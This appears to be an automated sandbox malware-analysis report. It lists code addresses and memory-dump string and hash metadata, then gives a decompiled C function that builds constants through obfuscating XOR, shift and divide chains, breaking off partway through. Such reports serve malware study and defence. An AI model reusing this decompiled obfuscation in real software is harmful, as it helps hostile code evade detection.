                                                                                                                                                                                                                    0x00a69239
                                                                                                                                                                                                                    0x00a69244
                                                                                                                                                                                                                    0x00a6924c
                                                                                                                                                                                                                    0x00a69257
                                                                                                                                                                                                                    0x00a69262
                                                                                                                                                                                                                    0x00a6926d
                                                                                                                                                                                                                    0x00a69278
                                                                                                                                                                                                                    0x00a69283
                                                                                                                                                                                                                    0x00a6928e
                                                                                                                                                                                                                    0x00a69299
                                                                                                                                                                                                                    0x00a692a4
                                                                                                                                                                                                                    0x00a692ac
                                                                                                                                                                                                                    0x00a692b1
                                                                                                                                                                                                                    0x00a692c0
                                                                                                                                                                                                                    0x00a692c6
                                                                                                                                                                                                                    0x00a692ce
                                                                                                                                                                                                                    0x00a692e1
                                                                                                                                                                                                                    0x00a692e4
                                                                                                                                                                                                                    0x00a692f3
                                                                                                                                                                                                                    0x00a692fa
                                                                                                                                                                                                                    0x00a69305
                                                                                                                                                                                                                    0x00a69310
                                                                                                                                                                                                                    0x00a69318
                                                                                                                                                                                                                    0x00a69323
                                                                                                                                                                                                                    0x00a6932b
                                                                                                                                                                                                                    0x00a69330
                                                                                                                                                                                                                    0x00a69338
                                                                                                                                                                                                                    0x00a69340
                                                                                                                                                                                                                    0x00a69348
                                                                                                                                                                                                                    0x00a69353
                                                                                                                                                                                                                    0x00a6935b
                                                                                                                                                                                                                    0x00a69363
                                                                                                                                                                                                                    0x00a6936e
                                                                                                                                                                                                                    0x00a69376
                                                                                                                                                                                                                    0x00a6937e
                                                                                                                                                                                                                    0x00a69386
                                                                                                                                                                                                                    0x00a6938e
                                                                                                                                                                                                                    0x00a69396
                                                                                                                                                                                                                    0x00a6939e
                                                                                                                                                                                                                    0x00a693a6
                                                                                                                                                                                                                    0x00a693ae
                                                                                                                                                                                                                    0x00a693b6
                                                                                                                                                                                                                    0x00a693be
                                                                                                                                                                                                                    0x00a693ce
                                                                                                                                                                                                                    0x00a693d2
                                                                                                                                                                                                                    0x00a693da
                                                                                                                                                                                                                    0x00a693e2
                                                                                                                                                                                                                    0x00a693ed
                                                                                                                                                                                                                    0x00a693f8
                                                                                                                                                                                                                    0x00a693ff
                                                                                                                                                                                                                    0x00a69402
                                                                                                                                                                                                                    0x00a69409
                                                                                                                                                                                                                    0x00a69414
                                                                                                                                                                                                                    0x00a6941c
                                                                                                                                                                                                                    0x00a69421
                                                                                                                                                                                                                    0x00a69429
                                                                                                                                                                                                                    0x00a69431
                                                                                                                                                                                                                    0x00a69439
                                                                                                                                                                                                                    0x00a69441
                                                                                                                                                                                                                    0x00a69449
                                                                                                                                                                                                                    0x00a69451
                                                                                                                                                                                                                    0x00a69459
                                                                                                                                                                                                                    0x00a69461
                                                                                                                                                                                                                    0x00a69469
                                                                                                                                                                                                                    0x00a69471
                                                                                                                                                                                                                    0x00a69479
                                                                                                                                                                                                                    0x00a69484
                                                                                                                                                                                                                    0x00a6948c
                                                                                                                                                                                                                    0x00a69497
                                                                                                                                                                                                                    0x00a694aa
                                                                                                                                                                                                                    0x00a694b1
                                                                                                                                                                                                                    0x00a694bc
                                                                                                                                                                                                                    0x00a694c4
                                                                                                                                                                                                                    0x00a694ce
                                                                                                                                                                                                                    0x00a694d2
                                                                                                                                                                                                                    0x00a694da
                                                                                                                                                                                                                    0x00a694e2
                                                                                                                                                                                                                    0x00a694ed
                                                                                                                                                                                                                    0x00a694f8
                                                                                                                                                                                                                    0x00a69503
                                                                                                                                                                                                                    0x00a69516
                                                                                                                                                                                                                    0x00a69529
                                                                                                                                                                                                                    0x00a6952c
                                                                                                                                                                                                                    0x00a69533
                                                                                                                                                                                                                    0x00a6953e
                                                                                                                                                                                                                    0x00a69546
                                                                                                                                                                                                                    0x00a6954b
                                                                                                                                                                                                                    0x00a69550
                                                                                                                                                                                                                    0x00a69558
                                                                                                                                                                                                                    0x00a69560
                                                                                                                                                                                                                    0x00a69573
                                                                                                                                                                                                                    0x00a6957a
                                                                                                                                                                                                                    0x00a69585
                                                                                                                                                                                                                    0x00a6958d
                                                                                                                                                                                                                    0x00a69595
                                                                                                                                                                                                                    0x00a695a2
                                                                                                                                                                                                                    0x00a695a6
                                                                                                                                                                                                                    0x00a695ae
                                                                                                                                                                                                                    0x00a695b9
                                                                                                                                                                                                                    0x00a695c4
                                                                                                                                                                                                                    0x00a695cf
                                                                                                                                                                                                                    0x00a695d7
                                                                                                                                                                                                                    0x00a695e0
                                                                                                                                                                                                                    0x00a695e5
                                                                                                                                                                                                                    0x00a695f0
                                                                                                                                                                                                                    0x00a695f1
                                                                                                                                                                                                                    0x00a695f5
                                                                                                                                                                                                                    0x00a695fd
                                                                                                                                                                                                                    0x00a69608
                                                                                                                                                                                                                    0x00a69613
                                                                                                                                                                                                                    0x00a6961e
                                                                                                                                                                                                                    0x00a69629
                                                                                                                                                                                                                    0x00a69634
                                                                                                                                                                                                                    0x00a6963f
                                                                                                                                                                                                                    0x00a69653
                                                                                                                                                                                                                    0x00a6965a
                                                                                                                                                                                                                    0x00a69665
                                                                                                                                                                                                                    0x00a69670
                                                                                                                                                                                                                    0x00a6967b
                                                                                                                                                                                                                    0x00a69686
                                                                                                                                                                                                                    0x00a69691
                                                                                                                                                                                                                    0x00a696a1
                                                                                                                                                                                                                    0x00a696a8
                                                                                                                                                                                                                    0x00a696b3
                                                                                                                                                                                                                    0x00a696bb
                                                                                                                                                                                                                    0x00a696c3
                                                                                                                                                                                                                    0x00a696c8
                                                                                                                                                                                                                    0x00a696cd
                                                                                                                                                                                                                    0x00a696d5
                                                                                                                                                                                                                    0x00a696e0
                                                                                                                                                                                                                    0x00a696e8
                                                                                                                                                                                                                    0x00a696f0
                                                                                                                                                                                                                    0x00a696fb
                                                                                                                                                                                                                    0x00a69706
                                                                                                                                                                                                                    0x00a6970e
                                                                                                                                                                                                                    0x00a69719
                                                                                                                                                                                                                    0x00a69724
                                                                                                                                                                                                                    0x00a6972f
                                                                                                                                                                                                                    0x00a6973a
                                                                                                                                                                                                                    0x00a69745
                                                                                                                                                                                                                    0x00a69750
                                                                                                                                                                                                                    0x00a6975b
                                                                                                                                                                                                                    0x00a69766
                                                                                                                                                                                                                    0x00a69771
                                                                                                                                                                                                                    0x00a69779
                                                                                                                                                                                                                    0x00a69781
                                                                                                                                                                                                                    0x00a69786
                                                                                                                                                                                                                    0x00a6978d
                                                                                                                                                                                                                    0x00a69795
                                                                                                                                                                                                                    0x00a6979d
                                                                                                                                                                                                                    0x00a697a2
                                                                                                                                                                                                                    0x00a697aa
                                                                                                                                                                                                                    0x00a697b2
                                                                                                                                                                                                                    0x00a697ba
                                                                                                                                                                                                                    0x00a697c2
                                                                                                                                                                                                                    0x00a697ca
                                                                                                                                                                                                                    0x00a697cf
                                                                                                                                                                                                                    0x00a697d7
                                                                                                                                                                                                                    0x00a697df
                                                                                                                                                                                                                    0x00a697ee
                                                                                                                                                                                                                    0x00a697f1
                                                                                                                                                                                                                    0x00a697f5
                                                                                                                                                                                                                    0x00a697fd
                                                                                                                                                                                                                    0x00a69805
                                                                                                                                                                                                                    0x00a69810
                                                                                                                                                                                                                    0x00a69818
                                                                                                                                                                                                                    0x00a69823
                                                                                                                                                                                                                    0x00a6982b
                                                                                                                                                                                                                    0x00a69833
                                                                                                                                                                                                                    0x00a6983d
                                                                                                                                                                                                                    0x00a69841
                                                                                                                                                                                                                    0x00a69849
                                                                                                                                                                                                                    0x00a6985c
                                                                                                                                                                                                                    0x00a69863
                                                                                                                                                                                                                    0x00a6986e
                                                                                                                                                                                                                    0x00a69879
                                                                                                                                                                                                                    0x00a69884
                                                                                                                                                                                                                    0x00a6988f
                                                                                                                                                                                                                    0x00a69897
                                                                                                                                                                                                                    0x00a6989f
                                                                                                                                                                                                                    0x00a698a7
                                                                                                                                                                                                                    0x00a698af
                                                                                                                                                                                                                    0x00a698b7
                                                                                                                                                                                                                    0x00a698c7
                                                                                                                                                                                                                    0x00a698cb
                                                                                                                                                                                                                    0x00a698d3
                                                                                                                                                                                                                    0x00a698db
                                                                                                                                                                                                                    0x00a698e6
                                                                                                                                                                                                                    0x00a698f1
                                                                                                                                                                                                                    0x00a698fc
                                                                                                                                                                                                                    0x00a69907
                                                                                                                                                                                                                    0x00a69912
                                                                                                                                                                                                                    0x00a6991d
                                                                                                                                                                                                                    0x00a69928
                                                                                                                                                                                                                    0x00a69933
                                                                                                                                                                                                                    0x00a6993e
                                                                                                                                                                                                                    0x00a69950
                                                                                                                                                                                                                    0x00a69953
                                                                                                                                                                                                                    0x00a6995a
                                                                                                                                                                                                                    0x00a69965
                                                                                                                                                                                                                    0x00a69978
                                                                                                                                                                                                                    0x00a6997f
                                                                                                                                                                                                                    0x00a6998a
                                                                                                                                                                                                                    0x00a69992
                                                                                                                                                                                                                    0x00a6999a
                                                                                                                                                                                                                    0x00a699a2
                                                                                                                                                                                                                    0x00a699aa
                                                                                                                                                                                                                    0x00a699b5
                                                                                                                                                                                                                    0x00a699c0
                                                                                                                                                                                                                    0x00a699cb
                                                                                                                                                                                                                    0x00a699d6
                                                                                                                                                                                                                    0x00a699de
                                                                                                                                                                                                                    0x00a699e9
                                                                                                                                                                                                                    0x00a699f1
                                                                                                                                                                                                                    0x00a699f9
                                                                                                                                                                                                                    0x00a69a01
                                                                                                                                                                                                                    0x00a69a0b
                                                                                                                                                                                                                    0x00a69a13
                                                                                                                                                                                                                    0x00a69a18
                                                                                                                                                                                                                    0x00a69a20
                                                                                                                                                                                                                    0x00a69a2b
                                                                                                                                                                                                                    0x00a69a30
                                                                                                                                                                                                                    0x00a69a36
                                                                                                                                                                                                                    0x00a69a3e
                                                                                                                                                                                                                    0x00a69a46
                                                                                                                                                                                                                    0x00a69a51
                                                                                                                                                                                                                    0x00a69a59
                                                                                                                                                                                                                    0x00a69a64
                                                                                                                                                                                                                    0x00a69a76
                                                                                                                                                                                                                    0x00a69a7b
                                                                                                                                                                                                                    0x00a69a84
                                                                                                                                                                                                                    0x00a69a8f
                                                                                                                                                                                                                    0x00a69a9a
                                                                                                                                                                                                                    0x00a69aa2
                                                                                                                                                                                                                    0x00a69aae
                                                                                                                                                                                                                    0x00a69ab1
                                                                                                                                                                                                                    0x00a69ab6
                                                                                                                                                                                                                    0x00a69abf
                                                                                                                                                                                                                    0x00a69ac3
                                                                                                                                                                                                                    0x00a69acb
                                                                                                                                                                                                                    0x00a69acb
                                                                                                                                                                                                                    0x00a69acb
                                                                                                                                                                                                                    0x00a69ad0
                                                                                                                                                                                                                    0x00a69ad0
                                                                                                                                                                                                                    0x00a69ad5
                                                                                                                                                                                                                    0x00a69ad5
                                                                                                                                                                                                                    0x00a69ad5
                                                                                                                                                                                                                    0x00a69ad5
                                                                                                                                                                                                                    0x00a69ad7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69add
                                                                                                                                                                                                                    0x00a69d14
                                                                                                                                                                                                                    0x00a69d1b
                                                                                                                                                                                                                    0x00a69d2a
                                                                                                                                                                                                                    0x00a69d2c
                                                                                                                                                                                                                    0x00a69d31
                                                                                                                                                                                                                    0x00a69d35
                                                                                                                                                                                                                    0x00a69d3a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69ae3
                                                                                                                                                                                                                    0x00a69ae9
                                                                                                                                                                                                                    0x00a69cc0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69aef
                                                                                                                                                                                                                    0x00a69af1
                                                                                                                                                                                                                    0x00a69e91
                                                                                                                                                                                                                    0x00a69af7
                                                                                                                                                                                                                    0x00a69afd
                                                                                                                                                                                                                    0x00a69cad
                                                                                                                                                                                                                    0x00a69cb2
                                                                                                                                                                                                                    0x00a69cb5
                                                                                                                                                                                                                    0x00a69cb7
                                                                                                                                                                                                                    0x00a69cb7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69b03
                                                                                                                                                                                                                    0x00a69b09
                                                                                                                                                                                                                    0x00a69bea
                                                                                                                                                                                                                    0x00a69bf6
                                                                                                                                                                                                                    0x00a69bfa
                                                                                                                                                                                                                    0x00a69c6e
                                                                                                                                                                                                                    0x00a69c80
                                                                                                                                                                                                                    0x00a69c83
                                                                                                                                                                                                                    0x00a69c88
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69b0f
                                                                                                                                                                                                                    0x00a69b0f
                                                                                                                                                                                                                    0x00a69b15
                                                                                                                                                                                                                    0x00a69b1b
                                                                                                                                                                                                                    0x00a69b24
                                                                                                                                                                                                                    0x00a69b2b
                                                                                                                                                                                                                    0x00a69b36
                                                                                                                                                                                                                    0x00a69b45
                                                                                                                                                                                                                    0x00a69b49
                                                                                                                                                                                                                    0x00a69b4d
                                                                                                                                                                                                                    0x00a69b86
                                                                                                                                                                                                                    0x00a69ba9
                                                                                                                                                                                                                    0x00a69bba
                                                                                                                                                                                                                    0x00a69bd3
                                                                                                                                                                                                                    0x00a69bd8
                                                                                                                                                                                                                    0x00a69bdb
                                                                                                                                                                                                                    0x00a69be0
                                                                                                                                                                                                                    0x00a69be0
                                                                                                                                                                                                                    0x00a69e51
                                                                                                                                                                                                                    0x00a69e51
                                                                                                                                                                                                                    0x00a69e55
                                                                                                                                                                                                                    0x00a69e5a
                                                                                                                                                                                                                    0x00a69e5a
                                                                                                                                                                                                                    0x00a69b15
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69b09
                                                                                                                                                                                                                    0x00a69afd
                                                                                                                                                                                                                    0x00a69af1
                                                                                                                                                                                                                    0x00a69ae9
                                                                                                                                                                                                                    0x00a69e9b
                                                                                                                                                                                                                    0x00a69ea5
                                                                                                                                                                                                                    0x00a69ea5
                                                                                                                                                                                                                    0x00a69d42
                                                                                                                                                                                                                    0x00a69d44
                                                                                                                                                                                                                    0x00a69e33
                                                                                                                                                                                                                    0x00a69e44
                                                                                                                                                                                                                    0x00a69e47
                                                                                                                                                                                                                    0x00a69e4c
                                                                                                                                                                                                                    0x00a69e4e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69d4a
                                                                                                                                                                                                                    0x00a69d4a
                                                                                                                                                                                                                    0x00a69d4c
                                                                                                                                                                                                                    0x00a69dde
                                                                                                                                                                                                                    0x00a69de5
                                                                                                                                                                                                                    0x00a69df4
                                                                                                                                                                                                                    0x00a69df6
                                                                                                                                                                                                                    0x00a69dfa
                                                                                                                                                                                                                    0x00a69dff
                                                                                                                                                                                                                    0x00a69ad0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69d4e
                                                                                                                                                                                                                    0x00a69d4e
                                                                                                                                                                                                                    0x00a69d54
                                                                                                                                                                                                                    0x00a69d9c
                                                                                                                                                                                                                    0x00a69da1
                                                                                                                                                                                                                    0x00a69da3
                                                                                                                                                                                                                    0x00a69dad
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69d56
                                                                                                                                                                                                                    0x00a69d56
                                                                                                                                                                                                                    0x00a69d5c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69d62
                                                                                                                                                                                                                    0x00a69d77
                                                                                                                                                                                                                    0x00a69d7d
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69d7d
                                                                                                                                                                                                                    0x00a69d5c
                                                                                                                                                                                                                    0x00a69d54
                                                                                                                                                                                                                    0x00a69d4c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69e5f
                                                                                                                                                                                                                    0x00a69e5f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a69e6b
                                                                                                                                                                                                                    0x00a69ad0

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 'I%$3$Jpt$QOL9$Q^'$WZN$]G$bq$e:'I%$t<7$x^s$4$O{$bm$C
                                                                                                                                                                                                                    • API String ID: 0-1715929427
                                                                                                                                                                                                                    • Opcode ID: eadb58872e3e158bfc59cb8488c92334cba9910c8d693157a6cc607187cb2fa8
                                                                                                                                                                                                                    • Instruction ID: b948eb848866550ec59f1341fe0b4ad4c725f30698b38312162322790869a10a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eadb58872e3e158bfc59cb8488c92334cba9910c8d693157a6cc607187cb2fa8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C620FB1509380CFD779CF61C58AA8BBBE2BBD4354F10891DE6DA86220D7B18949DF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                    			E00A7114E(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				char _v4;
                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				intOrPtr _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                    				intOrPtr _t389;
                                                                                                                                                                                                                    				void* _t399;
                                                                                                                                                                                                                    				signed int _t401;
                                                                                                                                                                                                                    				intOrPtr _t407;
                                                                                                                                                                                                                    				intOrPtr _t412;
                                                                                                                                                                                                                    				signed int _t414;
                                                                                                                                                                                                                    				signed int _t415;
                                                                                                                                                                                                                    				signed int _t416;
                                                                                                                                                                                                                    				signed int _t417;
                                                                                                                                                                                                                    				signed int _t418;
                                                                                                                                                                                                                    				signed int _t419;
                                                                                                                                                                                                                    				signed int _t420;
                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                    				signed int _t422;
                                                                                                                                                                                                                    				signed int _t423;
                                                                                                                                                                                                                    				signed int _t424;
                                                                                                                                                                                                                    				signed int _t425;
                                                                                                                                                                                                                    				void* _t465;
                                                                                                                                                                                                                    				signed int _t472;
                                                                                                                                                                                                                    				intOrPtr* _t473;
                                                                                                                                                                                                                    				signed int _t476;
                                                                                                                                                                                                                    				intOrPtr _t481;
                                                                                                                                                                                                                    				signed int* _t483;
                                                                                                                                                                                                                    				void* _t485;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				E00A7C6D8(__edx);
                                                                                                                                                                                                                    				_v76 = 0xa5fd4b;
                                                                                                                                                                                                                    				_t483 =  &(( &_v176)[4]);
                                                                                                                                                                                                                    				_v76 = _v76 >> 0xe;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x00000296;
                                                                                                                                                                                                                    				_t412 = 0;
                                                                                                                                                                                                                    				_v172 = 0x5af575;
                                                                                                                                                                                                                    				_t476 = 0x1ed9b36;
                                                                                                                                                                                                                    				_t481 = 0;
                                                                                                                                                                                                                    				_t414 = 0x1b;
                                                                                                                                                                                                                    				_v172 = _v172 / _t414;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0xc4de0df3;
                                                                                                                                                                                                                    				_t472 = 0x41;
                                                                                                                                                                                                                    				_v172 = _v172 / _t472;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x030757ef;
                                                                                                                                                                                                                    				_v140 = 0xef3ffb;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x485ca40b;
                                                                                                                                                                                                                    				_t415 = 0x26;
                                                                                                                                                                                                                    				_v140 = _v140 * 0x3a;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x78b15461;
                                                                                                                                                                                                                    				_v176 = 0xaf89d;
                                                                                                                                                                                                                    				_v176 = _v176 | 0x9023ddab;
                                                                                                                                                                                                                    				_v176 = _v176 / _t415;
                                                                                                                                                                                                                    				_t416 = 0x12;
                                                                                                                                                                                                                    				_v176 = _v176 / _t416;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0x00316875;
                                                                                                                                                                                                                    				_v164 = 0x662b12;
                                                                                                                                                                                                                    				_v164 = _v164 + 0xffff63eb;
                                                                                                                                                                                                                    				_v164 = _v164 >> 8;
                                                                                                                                                                                                                    				_v164 = _v164 / _t472;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x0003ba85;
                                                                                                                                                                                                                    				_v136 = 0x74895d;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0xf14f99d3;
                                                                                                                                                                                                                    				_t417 = 0xd;
                                                                                                                                                                                                                    				_v136 = _v136 / _t417;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x1289160a;
                                                                                                                                                                                                                    				_v144 = 0x446cb4;
                                                                                                                                                                                                                    				_t418 = 0x5e;
                                                                                                                                                                                                                    				_v144 = _v144 * 0x61;
                                                                                                                                                                                                                    				_v144 = _v144 / _t418;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x0044affd;
                                                                                                                                                                                                                    				_v28 = 0x1131e3;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xf1f21f9c;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xf1e447f2;
                                                                                                                                                                                                                    				_v72 = 0xbbacb5;
                                                                                                                                                                                                                    				_t419 = 0x42;
                                                                                                                                                                                                                    				_v72 = _v72 / _t419;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x000d91db;
                                                                                                                                                                                                                    				_v40 = 0x2b53bd;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x7c44e3dd;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x7c6d2e94;
                                                                                                                                                                                                                    				_v124 = 0xe81023;
                                                                                                                                                                                                                    				_v124 = _v124 << 3;
                                                                                                                                                                                                                    				_t420 = 0x72;
                                                                                                                                                                                                                    				_v124 = _v124 * 0x1c;
                                                                                                                                                                                                                    				_v124 = _v124 ^ 0xcb054756;
                                                                                                                                                                                                                    				_v80 = 0x6b8012;
                                                                                                                                                                                                                    				_v80 = _v80 + 0xffff1160;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x0068c3b2;
                                                                                                                                                                                                                    				_v116 = 0x8a4c2d;
                                                                                                                                                                                                                    				_v116 = _v116 / _t420;
                                                                                                                                                                                                                    				_t421 = 0x2a;
                                                                                                                                                                                                                    				_v116 = _v116 / _t421;
                                                                                                                                                                                                                    				_v116 = _v116 ^ 0x0001ce27;
                                                                                                                                                                                                                    				_v20 = 0xb7736;
                                                                                                                                                                                                                    				_v20 = _v20 + 0x5c27;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x000a65d9;
                                                                                                                                                                                                                    				_v132 = 0xc38199;
                                                                                                                                                                                                                    				_v132 = _v132 + 0xffff0429;
                                                                                                                                                                                                                    				_t422 = 0x46;
                                                                                                                                                                                                                    				_v132 = _v132 * 0x39;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x2b46e80a;
                                                                                                                                                                                                                    				_v100 = 0xac1449;
                                                                                                                                                                                                                    				_v100 = _v100 + 0xffff5da4;
                                                                                                                                                                                                                    				_v100 = _v100 ^ 0x00acbb4e;
                                                                                                                                                                                                                    				_v64 = 0x4807a0;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x4ed4a374;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x4e9b8281;
                                                                                                                                                                                                                    				_v88 = 0x4115d7;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x265a3f0d;
                                                                                                                                                                                                                    				_v88 = _v88 ^ 0x261c623a;
                                                                                                                                                                                                                    				_v108 = 0x3361dd;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x443da0b2;
                                                                                                                                                                                                                    				_v108 = _v108 | 0x74e0f198;
                                                                                                                                                                                                                    				_v108 = _v108 ^ 0x74efe14c;
                                                                                                                                                                                                                    				_v68 = 0xae21da;
                                                                                                                                                                                                                    				_v68 = _v68 + 0x4038;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x00a953df;
                                                                                                                                                                                                                    				_v120 = 0x9850f0;
                                                                                                                                                                                                                    				_v120 = _v120 >> 7;
                                                                                                                                                                                                                    				_v120 = _v120 | 0x0185a77e;
                                                                                                                                                                                                                    				_v120 = _v120 ^ 0x018eb7c4;
                                                                                                                                                                                                                    				_v84 = 0x89b3d4;
                                                                                                                                                                                                                    				_v84 = _v84 + 0x723a;
                                                                                                                                                                                                                    				_v84 = _v84 ^ 0x0081792c;
                                                                                                                                                                                                                    				_v92 = 0xc0af53;
                                                                                                                                                                                                                    				_v92 = _v92 | 0xec5895cb;
                                                                                                                                                                                                                    				_v92 = _v92 ^ 0xecd47aeb;
                                                                                                                                                                                                                    				_v96 = 0x137ef7;
                                                                                                                                                                                                                    				_v96 = _v96 * 0x70;
                                                                                                                                                                                                                    				_v96 = _v96 ^ 0x088aa871;
                                                                                                                                                                                                                    				_v168 = 0x29672a;
                                                                                                                                                                                                                    				_v168 = _v168 / _t422;
                                                                                                                                                                                                                    				_t423 = 0x70;
                                                                                                                                                                                                                    				_v168 = _v168 / _t423;
                                                                                                                                                                                                                    				_v168 = _v168 + 0x17eb;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x00085ec1;
                                                                                                                                                                                                                    				_v60 = 0x350d01;
                                                                                                                                                                                                                    				_t424 = 0x7a;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x3d;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x0ca01eee;
                                                                                                                                                                                                                    				_v112 = 0x20000b;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0x09c6c4b5;
                                                                                                                                                                                                                    				_v112 = _v112 << 7;
                                                                                                                                                                                                                    				_v112 = _v112 ^ 0xf367238d;
                                                                                                                                                                                                                    				_v148 = 0x4a407d;
                                                                                                                                                                                                                    				_v148 = _v148 | 0xf5b3725b;
                                                                                                                                                                                                                    				_v148 = _v148 << 0x10;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x72712d1d;
                                                                                                                                                                                                                    				_v156 = 0x98198;
                                                                                                                                                                                                                    				_v156 = _v156 + 0x3be1;
                                                                                                                                                                                                                    				_v156 = _v156 | 0x5423fed2;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x7a31b88b;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x2e1fea26;
                                                                                                                                                                                                                    				_v48 = 0x7f1d64;
                                                                                                                                                                                                                    				_v48 = _v48 / _t424;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x0000ec6a;
                                                                                                                                                                                                                    				_v24 = 0xdcbe5b;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x2ba;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00d517e0;
                                                                                                                                                                                                                    				_v128 = 0x62b9ee;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x7c69d3d9;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0xebe1ec60;
                                                                                                                                                                                                                    				_v128 = _v128 ^ 0x97e4bcc0;
                                                                                                                                                                                                                    				_v56 = 0x88681e;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x6afafde3;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x6a772a1b;
                                                                                                                                                                                                                    				_v32 = 0x453e44;
                                                                                                                                                                                                                    				_v32 = _v32 >> 6;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x000bfce7;
                                                                                                                                                                                                                    				_v104 = 0x77aae2;
                                                                                                                                                                                                                    				_v104 = _v104 + 0xffffd3f5;
                                                                                                                                                                                                                    				_v104 = _v104 >> 6;
                                                                                                                                                                                                                    				_v104 = _v104 ^ 0x0006b387;
                                                                                                                                                                                                                    				_v36 = 0x29ef49;
                                                                                                                                                                                                                    				_v36 = _v36 << 5;
